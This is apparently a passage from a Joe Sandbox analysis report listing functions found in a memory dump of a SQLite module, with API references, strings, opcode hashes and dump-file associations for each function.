                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: invalid rootpage$orphan index
                                                                                              • API String ID: 0-4061570254
                                                                                              • Opcode ID: b6d04ae7ccb6def1b923bab4c7159ad02e584b906af7b37076cfa7070bd1cc2e
                                                                                              • Instruction ID: 4692fa2f0f1ad511ff841e00a3feedf71fcc3f2a9b0da536d8eb7a991d4b5170
                                                                                              • Opcode Fuzzy Hash: b6d04ae7ccb6def1b923bab4c7159ad02e584b906af7b37076cfa7070bd1cc2e
                                                                                              • Instruction Fuzzy Hash: 4E51AC74A043458FEB62CF68C480B9ABBF1AF89308F24C56DE8998F351D731D842CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3C75B Relevance: 10.6, APIs: 7, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3C783
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3C795
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C7AB
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3C7B9
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3C89B
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3C8A6
                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3C8BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                              • String ID:
                                                                                              • API String ID: 2838836587-0
                                                                                              • Opcode ID: 7a1af8179303211107d89f16b87f953ec3da3de4a159af8c9c71f8942b00b500
                                                                                              • Instruction ID: e7e2d8419c0fd305c4ca8e5831b7174966073de055ad9435788a944697c27d6f
                                                                                              • Opcode Fuzzy Hash: 7a1af8179303211107d89f16b87f953ec3da3de4a159af8c9c71f8942b00b500
                                                                                              • Instruction Fuzzy Hash: BF5183B5A047599FCB00DFA9C48469EBBF0BF88324F10C92AE858AB344D734E945CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E27B9B Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2264764126-0
                                                                                              • Opcode ID: d058a993af42cb86fea1a59e7da52d3455e748a7fe53b1c3e3552f745b78ea45
                                                                                              • Instruction ID: 2bc8c59c20b8d22348804299da9c5a1c24a6c61704392f4113c65ddbd9dc0220
                                                                                              • Opcode Fuzzy Hash: d058a993af42cb86fea1a59e7da52d3455e748a7fe53b1c3e3552f745b78ea45
                                                                                              • Instruction Fuzzy Hash: AC319071E046568FDB049FB9C4A16ADBFF0AF9D314F24C469E8A9AB300D735E842CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3DE06 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DE50
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DE7F
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3DEA4
                                                                                                • Part of subcall function 61E3D74F: sqlite3_mprintf.SQLITE3 ref: 61E3D764
                                                                                                • Part of subcall function 61E3D74F: sqlite3_result_error.SQLITE3 ref: 61E3D77A
                                                                                                • Part of subcall function 61E3D74F: sqlite3_free.SQLITE3 ref: 61E3D782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                              • String ID: insert$set
                                                                                              • API String ID: 832408550-3711289001
                                                                                              • Opcode ID: 22ec8db78650d714ea153c20f8bb89faedf6b494268b674d19264ca8e54fe863
                                                                                              • Instruction ID: b9c3dc24dbb6817829647f4c551625551972ac0dfb1156bc8e73c09a67f4bc36
                                                                                              • Opcode Fuzzy Hash: 22ec8db78650d714ea153c20f8bb89faedf6b494268b674d19264ca8e54fe863
                                                                                              • Instruction Fuzzy Hash: 9F317A78E042A89BCB01DFA9C484AADBBF5BFC4318F65C419E8948B310DB34E845CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E38029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E38054
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E380B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_error
                                                                                              • String ID: J
                                                                                              • API String ID: 497837271-1141589763
                                                                                              • Opcode ID: 776c6b12fb92b453155899d7e7b4b63c15b2a233bbd98b9ae10a4f187657ade1
                                                                                              • Instruction ID: d5ab37abe87de12d08c4c65baee3c62806a24f3b398c886ddf247d612400a361
                                                                                              • Opcode Fuzzy Hash: 776c6b12fb92b453155899d7e7b4b63c15b2a233bbd98b9ae10a4f187657ade1
                                                                                              • Instruction Fuzzy Hash: FA318234B04396DBD710AF78C884B5DBBA0AFC5318F20CA2CE8998B345C735E946CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3797E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E379A4
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E379AE
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E379D8
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E379E3
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E37A23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                              • String ID: null
                                                                                              • API String ID: 1955785328-634125391
                                                                                              • Opcode ID: 877016cdb49361483166d0af10926027aa7f353452168b97c94bb9a143c6fc88
                                                                                              • Instruction ID: d38e2393cbaae2010e3b464f23cf9a6ca21f8809dd423587f2abdb1933e7326b
                                                                                              • Opcode Fuzzy Hash: 877016cdb49361483166d0af10926027aa7f353452168b97c94bb9a143c6fc88
                                                                                              • Instruction Fuzzy Hash: 5611EB71F482918AD7006E69989436ABFD2DBC6238F69C57ED5448B344D235C893C386
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E29A22 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 61E253DF: sqlite3_log.SQLITE3(?,?,?,?,?,61E25492), ref: 61E2541A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E29A51
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E29A65
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E29A93
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E29AA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: bad parameter or other API misuse$out of memory
                                                                                              • API String ID: 3568942437-948784999
                                                                                              • Opcode ID: e533917cea8f60075104c594b201468363092a471e17021898fd5eb174904ce8
                                                                                              • Instruction ID: 4f83a1541461600fcc814bbf17c255940e095cc3e55fbf6510267c773f91b2bc
                                                                                              • Opcode Fuzzy Hash: e533917cea8f60075104c594b201468363092a471e17021898fd5eb174904ce8
                                                                                              • Instruction Fuzzy Hash: 7101ED75A043518BEB00AFB984D0559BBE4AF85758F2988BDDD88CF305DB35C8409791
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3FF3E Relevance: 9.4, APIs: 6, Instructions: 376stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strcmp.MSVCRT ref: 61E40359
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E40391
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403AA
                                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403E1
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403FA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E4040D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2202632817-0
                                                                                              • Opcode ID: 6091edd5d97de220f433419f4cba27847e171edb7d6e55858525e84243593899
                                                                                              • Instruction ID: b5f3af8407019cf5c9f60102fb113b8279f904bc166830355339d2a9aeb7eb5e
                                                                                              • Opcode Fuzzy Hash: 6091edd5d97de220f433419f4cba27847e171edb7d6e55858525e84243593899
                                                                                              • Instruction Fuzzy Hash: 92F1D374A042498FDB05CFA9D48079EBBF1BF99318F24C529D858EB349E774E846CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E158C1 Relevance: 9.3, APIs: 6, Instructions: 262COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 2585109301-0
                                                                                              • Opcode ID: 65d7490dd0b911d0b53f661dc170e52bef7320915fe207cb9d14685b6eccf493
                                                                                              • Instruction ID: 67cc383b3c8e22962a4279b0897a8604d37e7930bb2ddf7651c2defaf36316ac
                                                                                              • Opcode Fuzzy Hash: 65d7490dd0b911d0b53f661dc170e52bef7320915fe207cb9d14685b6eccf493
                                                                                              • Instruction Fuzzy Hash: 01B104B1A05206CFDB04CF68C48179AB7B1BF8A318F29C569DC59AB309D730E852CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E93A80 Relevance: 9.2, APIs: 6, Instructions: 220COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69915a3cf6f5bd11527f1b70253990bf9f428d4a55d8e5d5535bdce1c946631c
                                                                                              • Instruction ID: 4a4d23ea1d2da0c3227055c0f80493f3b1e5e60790a9d0fe2fdd13b82a939518
                                                                                              • Opcode Fuzzy Hash: 69915a3cf6f5bd11527f1b70253990bf9f428d4a55d8e5d5535bdce1c946631c
                                                                                              • Instruction Fuzzy Hash: 90814575A05A519FEB10DFB9C58064DBBF2BF85354F248829E889DB304E730E945CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3D14C Relevance: 9.1, APIs: 6, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D16D
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D2B9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D2C1
                                                                                                • Part of subcall function 61E39581: sqlite3_free.SQLITE3 ref: 61E39590
                                                                                                • Part of subcall function 61E39581: sqlite3_vmprintf.SQLITE3 ref: 61E395A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2044204354-0
                                                                                              • Opcode ID: a402e3786245dd91493d6f8c20e556d28bddd2b8c07d5d249a0b468e9d7df43d
                                                                                              • Instruction ID: 0df2ba22e1c41b1321572ced752d9e0370086dd2162d1ed707089ea3c3e7a13a
                                                                                              • Opcode Fuzzy Hash: a402e3786245dd91493d6f8c20e556d28bddd2b8c07d5d249a0b468e9d7df43d
                                                                                              • Instruction Fuzzy Hash: 284106B4A082599FDB00DFA9D4806AEBBF4BF88714F60C92EE858D7354EB34D801CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E366D8 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E366E8
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • memcmp.MSVCRT ref: 61E3675A
                                                                                              • memcmp.MSVCRT ref: 61E3677F
                                                                                              • memcmp.MSVCRT ref: 61E367A9
                                                                                              • memcmp.MSVCRT ref: 61E367D8
                                                                                              • memcmp.MSVCRT ref: 61E36804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 40721531-0
                                                                                              • Opcode ID: e17c067860422a930f2f18dac6a6708e861f0145f77e8dc98f5c2863f5af3501
                                                                                              • Instruction ID: 1a82dc28c26c7554558e836386c3c7f06488bbd59839a2eb5f4cd8c9e5445806
                                                                                              • Opcode Fuzzy Hash: e17c067860422a930f2f18dac6a6708e861f0145f77e8dc98f5c2863f5af3501
                                                                                              • Instruction Fuzzy Hash: 27414FB1A083518BE7119FA9C68435ABEF5AFCC348F25C82DD8548B384E775D986CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E261C7 Relevance: 9.1, APIs: 6, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E261E9
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26217
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E26245
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26264
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26272
                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E262A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
